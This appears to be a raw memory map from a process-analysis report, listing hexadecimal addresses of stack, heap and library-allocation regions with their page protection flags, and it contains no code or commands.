744E000
stack
page read and write
8282000
heap
page read and write
73B0000
trusted library allocation
page read and write
4D27000
trusted library allocation
page read and write
E0D000
stack
page read and write
7419000
heap
page read and write
3270000
heap
page read and write
7AE0000
trusted library allocation
page execute and read and write
3381000
heap
page read and write
43C0000
heap
page readonly
F02000
trusted library allocation
page read and write
46B5000
heap
page read and write
6CCF000
stack
page read and write
6BBD000
stack
page read and write
5B59000
trusted library allocation
page read and write
72C2000
heap
page read and write
B46000
heap
page read and write
5141000
trusted library allocation
page read and write
75FE000
stack
page read and write
83E0000
trusted library allocation
page read and write
AFF000
heap
page read and write
7C7B000
trusted library allocation
page read and write
80C0000
trusted library allocation
page read and write
ED3000
trusted library allocation
page execute and read and write
7F6D0000
trusted library allocation
page execute and read and write
49D6000
trusted library allocation
page read and write
924000
heap
page read and write
8331000
heap
page read and write
556E000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
3600000
trusted library allocation
page read and write
49E4000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
6D08000
heap
page read and write
8612000
heap
page read and write
E20000
trusted library section
page read and write
70C0000
trusted library allocation
page read and write
831B000
heap
page read and write
4A41000
trusted library allocation
page read and write
D14000
heap
page read and write
81A0000
heap
page read and write
29EE000
unkown
page read and write
8490000
trusted library allocation
page execute and read and write
2FC7000
heap
page read and write
750E000
stack
page read and write
517B000
trusted library allocation
page read and write
7BE7000
trusted library allocation
page read and write
88A000
trusted library allocation
page execute and read and write
46B0000
heap
page read and write
7721000
heap
page read and write
83E5000
trusted library allocation
page read and write
7719000
heap
page read and write
710F000
stack
page read and write
ED0000
trusted library allocation
page read and write
7002000
heap
page read and write
6F0E000
stack
page read and write
7E92000
trusted library allocation
page read and write
CC5000
heap
page read and write
455B000
trusted library allocation
page read and write
537C000
stack
page read and write
6B7B000
stack
page read and write
A35000
heap
page read and write
C4A000
heap
page read and write
6D50000
heap
page read and write
70F0000
trusted library allocation
page read and write
7289000
heap
page read and write
7A4E000
stack
page read and write
8820000
trusted library allocation
page read and write
44DE000
stack
page read and write
8274000
heap
page read and write
E54000
trusted library allocation
page read and write
2FEB000
stack
page read and write
6E91000
heap
page read and write
81A0000
trusted library allocation
page read and write
70F0000
trusted library allocation
page read and write
726E000
stack
page read and write
703D000
stack
page read and write
868F000
heap
page read and write
7F2C0000
trusted library allocation
page execute and read and write
8200000
trusted library allocation
page read and write
CA5000
heap
page read and write
48A0000
heap
page execute and read and write
343E000
stack
page read and write
818F000
stack
page read and write
87F0000
trusted library allocation
page execute and read and write
6D3000
heap
page read and write
7406000
heap
page read and write
6ADB000
stack
page read and write
E1A000
heap
page read and write
A3A000
heap
page read and write
75BE000
stack
page read and write
7570000
trusted library allocation
page read and write
7060000
trusted library allocation
page read and write
49E1000
trusted library allocation
page read and write
73D8000
heap
page read and write
7350000
trusted library allocation
page execute and read and write
CA7000
heap
page read and write
5525000
trusted library allocation
page read and write
771E000
stack
page read and write
7DAC000
heap
page read and write
7A80000
heap
page read and write
7050000
trusted library allocation
page read and write
7D76000
heap
page read and write
76A0000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
D30000
heap
page read and write
71A0000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
7DB0000
heap
page read and write
84E0000
heap
page read and write
5A52000
trusted library allocation
page read and write
6F82000
trusted library allocation
page read and write
708000
heap
page read and write
CFE000
stack
page read and write
48DE000
stack
page read and write
7FD0000
trusted library allocation
page read and write
84A0000
trusted library allocation
page read and write
7100000
heap
page read and write
6D65000
heap
page execute and read and write
8DE000
stack
page read and write
E0E000
stack
page read and write
318F000
unkown
page read and write
B0C000
stack
page read and write
4E20000
heap
page read and write
F05000
trusted library allocation
page execute and read and write
5706000
trusted library allocation
page read and write
5901000
trusted library allocation
page read and write
8530000
trusted library allocation
page read and write
83DB000
heap
page read and write
44F0000
heap
page read and write
4620000
trusted library allocation
page read and write
34E5000
heap
page read and write
3100000
heap
page read and write
6E70000
trusted library allocation
page read and write
7D3F000
heap
page read and write
496F000
stack
page read and write
6E2E000
stack
page read and write
892F000
heap
page read and write
43D8000
trusted library allocation
page read and write
5719000
trusted library allocation
page read and write
5AAD000
trusted library allocation
page read and write
E5D000
trusted library allocation
page execute and read and write
693E000
stack
page read and write
4B7000
stack
page read and write
7BA0000
trusted library allocation
page execute and read and write
7D70000
trusted library allocation
page read and write
7728000
heap
page read and write
85D0000
trusted library allocation
page read and write
6BB000
heap
page read and write
5699000
trusted library allocation
page read and write
EB0000
trusted library allocation
page read and write
73E8000
heap
page read and write
4D10000
trusted library allocation
page read and write
6F8E000
stack
page read and write
752E000
stack
page read and write
7CD0000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
6FCE000
stack
page read and write
7610000
trusted library allocation
page read and write
E82000
trusted library allocation
page read and write
77C0000
trusted library allocation
page read and write
849D000
stack
page read and write
EDD000
trusted library allocation
page execute and read and write
73DD000
stack
page read and write
76C0000
trusted library allocation
page read and write
5B71000
trusted library allocation
page read and write
6EDB000
heap
page read and write
2FAD000
heap
page read and write
49FE000
stack
page read and write
8597000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
757E000
stack
page read and write
7D8000
stack
page read and write
76DF000
stack
page read and write
7D80000
trusted library allocation
page read and write
E80000
heap
page read and write
73C8000
heap
page read and write
8288000
heap
page read and write
3303000
heap
page read and write
2FB0000
heap
page read and write
9F0000
heap
page read and write
C23000
heap
page read and write
85E8000
heap
page read and write
557C000
trusted library allocation
page read and write
72EF000
heap
page read and write
54A5000
trusted library allocation
page read and write
915000
heap
page read and write
86C0000
trusted library allocation
page read and write
8183000
trusted library allocation
page read and write
979000
heap
page read and write
820000
heap
page read and write
6E8D000
heap
page read and write
469E000
stack
page read and write
8945000
heap
page read and write
76C0000
trusted library allocation
page read and write
6E6E000
heap
page read and write
835000
heap
page read and write
4A93000
trusted library allocation
page read and write
72F1000
heap
page read and write
6FC0000
trusted library allocation
page read and write
F39000
heap
page read and write
79C0000
trusted library allocation
page read and write
7CD2000
heap
page read and write
BC1000
heap
page read and write
800000
heap
page read and write
4630000
heap
page readonly
8873000
trusted library allocation
page read and write
6BDB000
stack
page read and write
2E00000
heap
page read and write
7620000
trusted library allocation
page read and write
46A0000
trusted library allocation
page read and write
F20000
heap
page readonly
7AF0000
trusted library allocation
page read and write
77F0000
heap
page read and write
7BB0000
trusted library allocation
page read and write
3480000
trusted library allocation
page read and write
443E000
stack
page read and write
49AC000
stack
page read and write
7240000
trusted library allocation
page read and write
7F5D0000
trusted library allocation
page execute and read and write
89FE000
stack
page read and write
73F8000
heap
page read and write
33D8000
heap
page read and write
79B0000
trusted library allocation
page read and write
4FC6000
trusted library allocation
page read and write
83F6000
trusted library allocation
page read and write
44BD000
stack
page read and write
49DC000
trusted library allocation
page read and write
4FCA000
trusted library allocation
page read and write
4AAC000
trusted library allocation
page read and write
867E000
heap
page read and write
7A40000
trusted library allocation
page read and write
53E0000
heap
page execute and read and write
5509000
trusted library allocation
page read and write
4D72000
trusted library allocation
page read and write
E50000
trusted library allocation
page read and write
71D0000
trusted library allocation
page read and write
6E7A000
stack
page read and write
82F0000
heap
page read and write
950000
heap
page read and write
80E0000
trusted library allocation
page read and write
7D56000
heap
page read and write
4F7D000
trusted library allocation
page read and write
7290000
heap
page read and write
33B0000
heap
page read and write
698E000
stack
page read and write
5850000
trusted library allocation
page read and write
84E2000
trusted library allocation
page read and write
7180000
trusted library allocation
page read and write
EC4000
trusted library allocation
page read and write
7D36000
heap
page read and write
70BB000
stack
page read and write
7540000
trusted library allocation
page read and write
59C1000
trusted library allocation
page read and write
4600000
trusted library allocation
page read and write
6A45000
heap
page execute and read and write
9722000
trusted library allocation
page read and write
7420000
heap
page read and write
3660000
trusted library allocation
page execute and read and write
32F0000
trusted library allocation
page read and write
73A9000
heap
page read and write
82DF000
heap
page read and write
45F2000
trusted library allocation
page read and write
864000
trusted library allocation
page read and write
8865000
trusted library allocation
page read and write
AE5000
heap
page read and write
6E4000
heap
page read and write
4878000
trusted library allocation
page read and write
7E8A000
heap
page read and write
910000
heap
page read and write
7980000
trusted library allocation
page read and write
700E000
stack
page read and write
8190000
trusted library allocation
page execute and read and write
3238000
stack
page read and write
7260000
trusted library allocation
page read and write
731E000
stack
page read and write
81D0000
heap
page read and write
6F7B000
stack
page read and write
6ECE000
stack
page read and write
82EC000
heap
page read and write
BBB000
heap
page read and write
81EE000
stack
page read and write
7DD000
stack
page read and write
E10000
heap
page read and write
83A7000
heap
page read and write
7C90000
heap
page read and write
85DC000
heap
page read and write
6B5F000
stack
page read and write
819F000
stack
page read and write
49CB000
trusted library allocation
page read and write
32E0000
trusted library allocation
page read and write
7DA0000
heap
page read and write
4E37000
heap
page read and write
6B9E000
stack
page read and write
6DD4000
heap
page read and write
6FFE000
stack
page read and write
83E9000
trusted library allocation
page read and write
73B000
heap
page read and write
859A000
trusted library allocation
page read and write
F1A000
heap
page read and write
87CD000
heap
page read and write
8472000
trusted library allocation
page read and write
A9C000
heap
page read and write
76D0000
trusted library allocation
page read and write
BDB000
heap
page read and write
7E31000
heap
page read and write
73C0000
heap
page execute and read and write
7CB0000
trusted library allocation
page read and write
7A0E000
stack
page read and write
8679000
heap
page read and write
6C9D000
stack
page read and write
7080000
trusted library allocation
page read and write
5DF000
stack
page read and write
882000
trusted library allocation
page read and write
F2C000
stack
page read and write
7033000
heap
page read and write
749000
heap
page read and write
73F0000
trusted library allocation
page execute and read and write
6EFE000
stack
page read and write
75C2000
trusted library allocation
page read and write
85E4000
heap
page read and write
5B6D000
trusted library allocation
page read and write
7E0E000
stack
page read and write
E60000
heap
page read and write
763E000
stack
page read and write
81E0000
heap
page read and write
86D0000
trusted library allocation
page execute and read and write
4C70000
trusted library allocation
page execute and read and write
64B9000
trusted library allocation
page read and write
4A1B000
trusted library allocation
page read and write
71CD000
stack
page read and write
3337000
heap
page read and write
6CDE000
stack
page read and write
733E000
stack
page read and write
624000
heap
page read and write
888D000
stack
page read and write
56FA000
trusted library allocation
page read and write
72ED000
heap
page read and write
718F000
stack
page read and write
718E000
stack
page read and write
7530000
trusted library allocation
page read and write
83B5000
trusted library allocation
page read and write
7E4A000
heap
page read and write
892000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
5579000
trusted library allocation
page read and write
80BC000
stack
page read and write
73E0000
trusted library allocation
page read and write
7F7D8000
trusted library allocation
page execute and read and write
79C000
stack
page read and write
5123000
trusted library allocation
page read and write
34A7000
heap
page read and write
4D95000
trusted library allocation
page read and write
BC0000
heap
page read and write
690B000
stack
page read and write
5B79000
trusted library allocation
page read and write
4977000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
85D8000
heap
page read and write
5667000
trusted library allocation
page read and write
754E000
stack
page read and write
30B0000
trusted library allocation
page read and write
3625000
trusted library allocation
page execute and read and write
4B69000
trusted library allocation
page read and write
80F0000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
73AF000
heap
page read and write
F20000
heap
page readonly
595000
heap
page read and write
32F3000
trusted library allocation
page execute and read and write
49E7000
trusted library allocation
page read and write
54C9000
trusted library allocation
page read and write
ABC000
heap
page read and write
87E0000
trusted library allocation
page execute and read and write
7340000
heap
page execute and read and write
351E000
unkown
page read and write
863000
trusted library allocation
page execute and read and write
35E0000
trusted library allocation
page read and write
D10000
heap
page read and write
7640000
trusted library allocation
page read and write
46C4000
heap
page read and write
6F7D000
stack
page read and write
A6A000
heap
page read and write
EF0000
trusted library allocation
page read and write
8CB1000
heap
page read and write
846E000
heap
page read and write
708D000
stack
page read and write
6A52000
trusted library allocation
page read and write
E85000
trusted library allocation
page execute and read and write
546F000
trusted library allocation
page read and write
84DE000
stack
page read and write
5B6A000
trusted library allocation
page read and write
89E9000
heap
page read and write
4767000
heap
page read and write
4AA3000
trusted library allocation
page read and write
34F4000
heap
page read and write
714D000
stack
page read and write
80C0000
trusted library allocation
page execute and read and write
69FF000
stack
page read and write
65E000
unkown
page read and write
51DB000
trusted library allocation
page read and write
8356000
heap
page read and write
7FC0000
trusted library allocation
page read and write
7527000
trusted library allocation
page read and write
748E000
stack
page read and write
9713000
trusted library allocation
page read and write
7B09000
heap
page read and write
86CF000
stack
page read and write
A34000
heap
page read and write
7F3D0000
trusted library allocation
page execute and read and write
ED9000
trusted library allocation
page read and write
5529000
trusted library allocation
page read and write
7AE9000
heap
page read and write
7590000
trusted library allocation
page read and write
6C7B000
stack
page read and write
815D000
stack
page read and write
AD8000
heap
page read and write
7B90000
heap
page read and write
764A000
trusted library allocation
page read and write
9FA000
heap
page read and write
4A2E000
trusted library allocation
page read and write
C20000
heap
page read and write
6B5B000
stack
page read and write
7B33000
heap
page read and write
3383000
heap
page read and write
81D0000
trusted library allocation
page read and write
59D9000
trusted library allocation
page read and write
530000
heap
page read and write
6ABE000
stack
page read and write
6A1D000
stack
page read and write
6A0000
heap
page read and write
85D0000
heap
page read and write
6DFD000
stack
page read and write
6E6F000
stack
page read and write
2F3E000
stack
page read and write
7660000
trusted library allocation
page read and write
59E1000
trusted library allocation
page read and write
45E9000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
29A0000
heap
page read and write
1BC000
stack
page read and write
7306000
heap
page read and write
4750000
heap
page read and write
707D000
stack
page read and write
8AFE000
stack
page read and write
7395000
heap
page read and write
542E000
stack
page read and write
81B0000
trusted library allocation
page execute and read and write
714B000
stack
page read and write
8290000
trusted library allocation
page read and write
8C57000
heap
page read and write
694E000
stack
page read and write
CCB000
heap
page read and write
792E000
stack
page read and write
82CE000
heap
page read and write
7CE0000
trusted library allocation
page read and write
EA0000
trusted library allocation
page read and write
707B000
stack
page read and write
8253000
heap
page read and write
846F000
stack
page read and write
74CE000
stack
page read and write
6A7A000
stack
page read and write
4640000
trusted library allocation
page execute and read and write
764E000
trusted library allocation
page read and write
6EF9000
heap
page read and write
EB0000
heap
page read and write
2FB8000
heap
page read and write
E7A000
trusted library allocation
page execute and read and write
79F0000
trusted library allocation
page read and write
80D0000
trusted library allocation
page read and write
6EBE000
stack
page read and write
6E39000
stack
page read and write
5701000
trusted library allocation
page read and write
6CDB000
stack
page read and write
64FD000
trusted library allocation
page read and write
7D42000
trusted library allocation
page read and write
ADE000
unkown
page read and write
7CAC000
heap
page read and write
3449000
trusted library allocation
page read and write
C47000
heap
page read and write
8C4F000
heap
page read and write
71CE000
stack
page read and write
836E000
stack
page read and write
7DBC000
heap
page read and write
8409000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
C30000
heap
page read and write
6CF0000
heap
page read and write
8397000
heap
page read and write
7270000
trusted library allocation
page read and write
3450000
trusted library allocation
page read and write
756B000
stack
page read and write
7C4F000
stack
page read and write
88D4000
heap
page read and write
7C90000
trusted library allocation
page read and write
B0F000
heap
page read and write
58A1000
trusted library allocation
page read and write
7C94000
heap
page read and write
A27000
heap
page read and write
83F1000
trusted library allocation
page read and write
69E000
unkown
page read and write
F10000
trusted library allocation
page read and write
657000
heap
page read and write
33AD000
unkown
page read and write
83ED000
trusted library allocation
page read and write
54B3000
trusted library allocation
page read and write
7CF0000
trusted library allocation
page read and write
7230000
trusted library allocation
page read and write
7A30000
trusted library allocation
page read and write
8270000
trusted library allocation
page read and write
7030000
trusted library allocation
page read and write
451E000
stack
page read and write
47DC000
stack
page read and write
68BE000
stack
page read and write
74AE000
stack
page read and write
7D70000
trusted library allocation
page read and write
EF2000
trusted library allocation
page read and write
80DE000
stack
page read and write
4D74000
trusted library allocation
page read and write
6B3D000
stack
page read and write
30EE000
unkown
page read and write
7774000
heap
page read and write
C90000
heap
page read and write
5480000
heap
page read and write
698D000
stack
page read and write
7A00000
trusted library allocation
page read and write
3465000
heap
page read and write
6E17000
heap
page read and write
3622000
trusted library allocation
page read and write
70CE000
stack
page read and write
6E95000
heap
page read and write
82DF000
heap
page read and write
8237000
trusted library allocation
page read and write
6AFE000
stack
page read and write
AF0000
heap
page read and write
7A20000
trusted library allocation
page read and write
A9E000
unkown
page read and write
82E4000
heap
page read and write
EF5000
trusted library allocation
page execute and read and write
7005000
heap
page read and write
46A5000
trusted library allocation
page read and write
35A0000
heap
page read and write
49C1000
trusted library allocation
page read and write
33E4000
heap
page read and write
7445000
heap
page read and write
6EF7000
heap
page read and write
35FD000
trusted library allocation
page execute and read and write
6A0000
heap
page read and write
733E000
heap
page read and write
703A000
heap
page read and write
70FE000
stack
page read and write
7650000
trusted library allocation
page read and write
752E000
stack
page read and write
34E0000
heap
page read and write
89A3000
heap
page read and write
74E0000
trusted library allocation
page read and write
56A5000
trusted library allocation
page read and write
6E7E000
stack
page read and write
B06000
heap
page read and write
8639000
heap
page read and write
81D8000
heap
page read and write
48F8000
trusted library allocation
page read and write
6EEE000
stack
page read and write
6E65000
heap
page execute and read and write
A00000
heap
page read and write
5AB6000
trusted library allocation
page read and write
A60000
heap
page read and write
5562000
trusted library allocation
page read and write
7D46000
heap
page read and write
6F3D000
stack
page read and write
EA0000
trusted library section
page read and write
70E0000
trusted library allocation
page read and write
477E000
stack
page read and write
7510000
trusted library allocation
page read and write
8240000
trusted library allocation
page read and write
35F9000
heap
page read and write
D3E000
stack
page read and write
59CB000
trusted library allocation
page read and write
5A41000
trusted library allocation
page read and write
83DF000
trusted library allocation
page read and write
D27000
heap
page read and write
898F000
stack
page read and write
7200000
trusted library allocation
page read and write
E4E000
stack
page read and write
7C20000
trusted library allocation
page read and write
8590000
trusted library allocation
page read and write
868E000
stack
page read and write
4D2B000
trusted library allocation
page read and write
4920000
heap
page read and write
4551000
trusted library allocation
page read and write
6B9E000
stack
page read and write
770D000
heap
page read and write
74B0000
trusted library allocation
page read and write
7F5E8000
trusted library allocation
page execute and read and write
8326000
heap
page read and write
F10000
heap
page read and write
7D40000
trusted library allocation
page read and write
30C0000
heap
page read and write
6A43000
trusted library allocation
page read and write
9F4000
heap
page read and write
6C3E000
stack
page read and write
718E000
stack
page read and write
76D0000
trusted library allocation
page read and write
5E0000
heap
page read and write
2F90000
heap
page read and write
7120000
trusted library allocation
page read and write
7CF0000
trusted library allocation
page read and write
7F250000
trusted library allocation
page execute and read and write
5061000
trusted library allocation
page read and write
7620000
trusted library allocation
page read and write
7220000
trusted library allocation
page read and write
7463000
heap
page read and write
562C000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
844D000
trusted library allocation
page read and write
7218000
heap
page read and write
73C4000
heap
page read and write
7E56000
heap
page read and write
8702000
heap
page read and write
83AA000
heap
page read and write
3310000
heap
page read and write
7CA4000
heap
page read and write
75AE000
stack
page read and write
9700000
trusted library allocation
page read and write
850000
trusted library allocation
page read and write
86FD000
stack
page read and write
7015000
heap
page read and write
77E0000
heap
page read and write
75C0000
trusted library allocation
page read and write
4D06000
trusted library allocation
page read and write
45DD000
trusted library allocation
page execute and read and write
7520000
trusted library allocation
page read and write
E90000
trusted library section
page read and write
70D0000
trusted library allocation
page read and write
830000
heap
page read and write
5961000
trusted library allocation
page read and write
48AE000
stack
page read and write
2FB0000
heap
page read and write
F10000
heap
page read and write
753E000
stack
page read and write
829B000
heap
page read and write
47FE000
stack
page read and write
5D49000
trusted library allocation
page read and write
7110000
trusted library allocation
page read and write
8BC0000
heap
page read and write
1FD000
stack
page read and write
34A9000
heap
page read and write
74C0000
trusted library allocation
page read and write
A2D000
trusted library allocation
page execute and read and write
7680000
trusted library allocation
page read and write
4890000
heap
page read and write
56B9000
trusted library allocation
page read and write
EF0000
trusted library allocation
page read and write
5353000
trusted library allocation
page read and write
5989000
trusted library allocation
page read and write
E75000
heap
page read and write
43FC000
stack
page read and write
4540000
heap
page execute and read and write
801E000
stack
page read and write
E5E000
stack
page read and write
83BF000
heap
page read and write
6DCA000
heap
page read and write
717D000
stack
page read and write
51CF000
trusted library allocation
page read and write
7FF0000
heap
page read and write
EE0000
trusted library allocation
page read and write
4C58000
trusted library allocation
page read and write
E20000
heap
page execute and read and write
45D0000
trusted library allocation
page read and write
6EAE000
stack
page read and write
70A0000
trusted library allocation
page read and write
494C000
stack
page read and write
78EE000
stack
page read and write
7EB0000
trusted library allocation
page execute and read and write
7ACF000
heap
page read and write
73E7000
heap
page read and write
8631000
heap
page read and write
6D2E000
stack
page read and write
871E000
stack
page read and write
7DCE000
stack
page read and write
8450000
trusted library allocation
page read and write
E6A000
heap
page read and write
4D20000
heap
page execute and read and write
8500000
trusted library allocation
page execute and read and write
81FD000
stack
page read and write
7DE2000
heap
page read and write
56E9000
trusted library allocation
page read and write
6FCB000
stack
page read and write
772B000
heap
page read and write
85D4000
heap
page read and write
6EB9000
heap
page read and write
664000
heap
page read and write
80F0000
heap
page read and write
6FBD000
stack
page read and write
F0E000
unkown
page read and write
5726000
trusted library allocation
page read and write
49BA000
heap
page read and write
8170000
trusted library allocation
page read and write
5490000
trusted library allocation
page read and write
F20000
trusted library section
page read and write
886A000
trusted library allocation
page read and write
83D6000
heap
page read and write
83AE000
stack
page read and write
7B40000
trusted library allocation
page execute and read and write
86E5000
heap
page read and write
73EB000
heap
page read and write
5D69000
trusted library allocation
page read and write
34D0000
heap
page readonly
85E0000
heap
page read and write
7210000
heap
page read and write
7C60000
heap
page read and write
837B000
heap
page read and write
4A08000
trusted library allocation
page read and write
920000
heap
page read and write
8FE000
heap
page read and write
7F6E8000
trusted library allocation
page execute and read and write
5521000
trusted library allocation
page read and write
8D23000
heap
page read and write
6C5E000
stack
page read and write
7320000
trusted library allocation
page read and write
7A0000
heap
page read and write
76B0000
trusted library allocation
page read and write
7B29000
heap
page read and write
83A2000
heap
page read and write
7140000
trusted library allocation
page read and write
7550000
trusted library allocation
page read and write
3440000
trusted library allocation
page read and write
7D50000
trusted library allocation
page read and write
7418000
heap
page read and write
8322000
heap
page read and write
A23000
trusted library allocation
page execute and read and write
7793000
heap
page read and write
481E000
stack
page read and write
CD0000
heap
page read and write
7D80000
trusted library allocation
page read and write
75ED000
stack
page read and write
5502000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
857E000
stack
page read and write
6F90000
heap
page execute and read and write
8B3E000
stack
page read and write
6DAE000
stack
page read and write
702B000
heap
page read and write
CC0000
heap
page read and write
46BA000
heap
page read and write
7440000
heap
page execute and read and write
7B3D000
trusted library allocation
page read and write
76C2000
heap
page read and write
4480000
trusted library allocation
page read and write
5130000
trusted library allocation
page read and write
826E000
stack
page read and write
835C000
heap
page read and write
75B0000
trusted library allocation
page read and write
82FC000
heap
page read and write
5ABB000
trusted library allocation
page read and write
7DFF000
heap
page read and write
7E86000
heap
page read and write
4A07000
trusted library allocation
page read and write
7490000
trusted library allocation
page execute and read and write
82E0000
heap
page read and write
ED0000
trusted library allocation
page read and write
E69000
trusted library allocation
page read and write
6E42000
heap
page read and write
8335000
heap
page read and write
35F3000
trusted library allocation
page execute and read and write
7042000
heap
page read and write
7600000
trusted library allocation
page execute and read and write
4949000
trusted library allocation
page read and write
32DE000
stack
page read and write
7C80000
trusted library allocation
page execute and read and write
6BFB000
stack
page read and write
894E000
stack
page read and write
73A0000
trusted library allocation
page read and write
83ED000
stack
page read and write
7FCA000
trusted library allocation
page read and write
EF7000
trusted library allocation
page execute and read and write
7ACB000
heap
page read and write
732E000
stack
page read and write
7D60000
trusted library allocation
page read and write
6B0000
heap
page read and write
3465000
trusted library allocation
page execute and read and write
34EA000
heap
page read and write
5491000
trusted library allocation
page read and write
7D9000
stack
page read and write
7D30000
trusted library allocation
page read and write
7450000
trusted library allocation
page read and write
864D000
heap
page read and write
79CE000
stack
page read and write
72B9000
heap
page read and write
6B1E000
stack
page read and write
7795000
heap
page read and write
D20000
heap
page read and write
742C000
heap
page read and write
4950000
heap
page execute and read and write
71CC000
stack
page read and write
82F8000
heap
page read and write
ED9000
trusted library allocation
page read and write
74A0000
trusted library allocation
page read and write
549E000
trusted library allocation
page read and write
88C000
stack
page read and write
49D3000
trusted library allocation
page read and write
6D4E000
stack
page read and write
56AA000
trusted library allocation
page read and write
8100000
heap
page read and write
540000
heap
page read and write
823A000
trusted library allocation
page read and write
860000
trusted library allocation
page read and write
C00000
heap
page read and write
7701000
heap
page read and write
50CD000
trusted library allocation
page read and write
83D6000
heap
page read and write
3496000
heap
page read and write
6E20000
heap
page read and write
82F4000
heap
page read and write
6D8000
heap
page read and write
81B0000
trusted library allocation
page execute and read and write
F3F000
stack
page read and write
6F0B000
heap
page read and write
49B0000
heap
page read and write
7B50000
heap
page read and write
8DFF000
heap
page read and write
75A0000
trusted library allocation
page read and write
7F3E8000
trusted library allocation
page execute and read and write
46C0000
heap
page read and write
4470000
trusted library allocation
page execute and read and write
B00000
heap
page read and write
8F9000
heap
page read and write
3419000
heap
page read and write
7DA5000
heap
page read and write
82C5000
heap
page read and write
E30000
trusted library section
page read and write
7C30000
trusted library allocation
page read and write
A24000
trusted library allocation
page read and write
30C9000
heap
page read and write
54D8000
trusted library allocation
page read and write
70B0000
trusted library allocation
page read and write
2DF0000
heap
page read and write
7B15000
heap
page read and write
723D000
heap
page read and write
5986000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
5501000
trusted library allocation
page read and write
7830000
trusted library allocation
page read and write
6D7E000
stack
page read and write
3343000
heap
page read and write
73FC000
heap
page read and write
874C000
heap
page read and write
3EB000
stack
page read and write
822B000
stack
page read and write
842E000
stack
page read and write
744F000
heap
page read and write
6D5D000
stack
page read and write
71BA000
stack
page read and write
7B0000
heap
page read and write
33F0000
heap
page read and write
743D000
stack
page read and write
F10000
trusted library section
page read and write
2FB8000
heap
page read and write
A77000
heap
page read and write
7CA0000
trusted library allocation
page read and write
8701000
trusted library allocation
page read and write
3279000
heap
page read and write
807E000
stack
page read and write
A88000
heap
page read and write
8321000
heap
page read and write
7560000
trusted library allocation
page read and write
4D38000
trusted library allocation
page read and write
761D000
stack
page read and write
53E5000
heap
page execute and read and write
4F70000
heap
page execute and read and write
7048000
trusted library allocation
page read and write
AE0000
heap
page read and write
73FE000
heap
page read and write
779E000
stack
page read and write
7480000
trusted library allocation
page read and write
442C000
stack
page read and write
5138000
trusted library allocation
page read and write
EAE000
stack
page read and write
890000
trusted library allocation
page read and write
6DBE000
stack
page read and write
EF2000
trusted library allocation
page read and write
A55000
heap
page read and write
5929000
trusted library allocation
page read and write
7283000
trusted library allocation
page read and write
85BC000
stack
page read and write
498C000
stack
page read and write
ED4000
trusted library allocation
page read and write
35F5000
heap
page read and write
86CC000
heap
page read and write
7580000
trusted library allocation
page read and write
6BDA000
stack
page read and write
B7F000
heap
page read and write
4B6F000
trusted library allocation
page read and write
7E8F000
heap
page read and write
6EA7000
heap
page read and write
8292000
heap
page read and write
B02000
heap
page read and write
C2A000
heap
page read and write
77DB000
stack
page read and write
A30000
heap
page read and write
E79000
heap
page read and write
48EE000
stack
page read and write
5408000
trusted library allocation
page read and write
8440000
trusted library allocation
page read and write
7090000
trusted library allocation
page read and write
75BE000
stack
page read and write
7370000
heap
page read and write
8280000
heap
page read and write
49BC000
trusted library allocation
page read and write
45D3000
trusted library allocation
page execute and read and write
7CA8000
heap
page read and write
2CFD000
stack
page read and write
59E1000
trusted library allocation
page read and write
35F0000
trusted library allocation
page read and write
E40000
trusted library allocation
page read and write
33E0000
heap
page read and write
75FD000
stack
page read and write
6E3B000
stack
page read and write
A50000
heap
page read and write
4D30000
heap
page execute and read and write
6A40000
heap
page execute and read and write
6A3D000
stack
page read and write
4F5E000
stack
page read and write
578C000
trusted library allocation
page read and write
70FD000
stack
page read and write
4961000
trusted library allocation
page read and write
6DEE000
stack
page read and write
83B6000
heap
page read and write
7C0E000
stack
page read and write
740D000
heap
page read and write
69D5000
heap
page execute and read and write
BFE000
stack
page read and write
8180000
trusted library allocation
page read and write
69BE000
stack
page read and write
83C5000
heap
page read and write
45C0000
trusted library allocation
page read and write
8278000
heap
page read and write
7FE0000
heap
page read and write
714E000
stack
page read and write
5778000
trusted library allocation
page read and write
6EF1000
heap
page read and write
85A0000
heap
page read and write
48EE000
stack
page read and write
55BE000
trusted library allocation
page read and write
6A35000
heap
page execute and read and write
7CD0000
trusted library allocation
page read and write
81C7000
trusted library allocation
page read and write
8230000
trusted library allocation
page read and write
8220000
trusted library allocation
page read and write
6DCE000
heap
page read and write
713B000
stack
page read and write
49A0000
trusted library allocation
page read and write
CE0000
heap
page read and write
6EB5000
heap
page execute and read and write
76A0000
trusted library allocation
page read and write
76B9000
heap
page read and write
4A30000
heap
page execute and read and write
2FB4000
heap
page read and write
895000
trusted library allocation
page execute and read and write
765B000
stack
page read and write
4650000
heap
page read and write
88CE000
stack
page read and write
739B000
heap
page read and write
73AD000
heap
page read and write
7E84000
heap
page read and write
83FA000
trusted library allocation
page read and write
729F000
heap
page read and write
7690000
trusted library allocation
page read and write
54C7000
trusted library allocation
page read and write
6A2E000
stack
page read and write
807E000
stack
page read and write
A20000
trusted library allocation
page read and write
86BE000
stack
page read and write
E30000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
697F000
stack
page read and write
E53000
trusted library allocation
page execute and read and write
4919000
trusted library allocation
page read and write
7C8E000
stack
page read and write
854E000
stack
page read and write
8B7D000
stack
page read and write
554A000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
4C80000
heap
page read and write
68CD000
stack
page read and write
81A0000
trusted library allocation
page read and write
7026000
heap
page read and write
87D2000
trusted library allocation
page read and write
447F000
stack
page read and write
80C0000
trusted library allocation
page execute and read and write
34CE000
stack
page read and write
74CE000
stack
page read and write
729D000
stack
page read and write
7360000
trusted library allocation
page read and write
7C5F000
stack
page read and write
76CB000
heap
page read and write
8F5000
heap
page read and write
7DB8000
heap
page read and write
F15000
heap
page read and write
45E0000
trusted library allocation
page read and write
709E000
stack
page read and write
7380000
heap
page read and write
E70000
heap
page read and write
DCE000
